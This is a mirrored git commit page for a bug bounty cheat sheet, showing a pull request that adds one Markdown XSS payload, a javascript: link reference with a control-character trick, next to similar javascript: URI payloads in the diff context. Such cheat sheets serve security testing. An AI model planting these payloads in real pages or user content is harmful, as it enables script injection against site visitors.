mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2024-11-22 02:53:06 +00:00
Merge pull request #40 from tarunkant/master
Added one payload in Markdown XSS
This commit is contained in:
commit
26f2820824
1 changed files with 4 additions and 0 deletions
|
@ -118,6 +118,10 @@ javas	cript://www.google.com/%0Aalert(1)
|
||||||
[a]: (javascript:prompt(1))
|
[a]: (javascript:prompt(1))
|
||||||
```
|
```
|
||||||
|
|
||||||
|
```md
|
||||||
|
[a]:(javascript:alert(1)) //Add SOH Character
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
**Flash SWF XSS**
|
**Flash SWF XSS**
|
||||||
|
|
||||||
|
|
Loading…
Reference in a new issue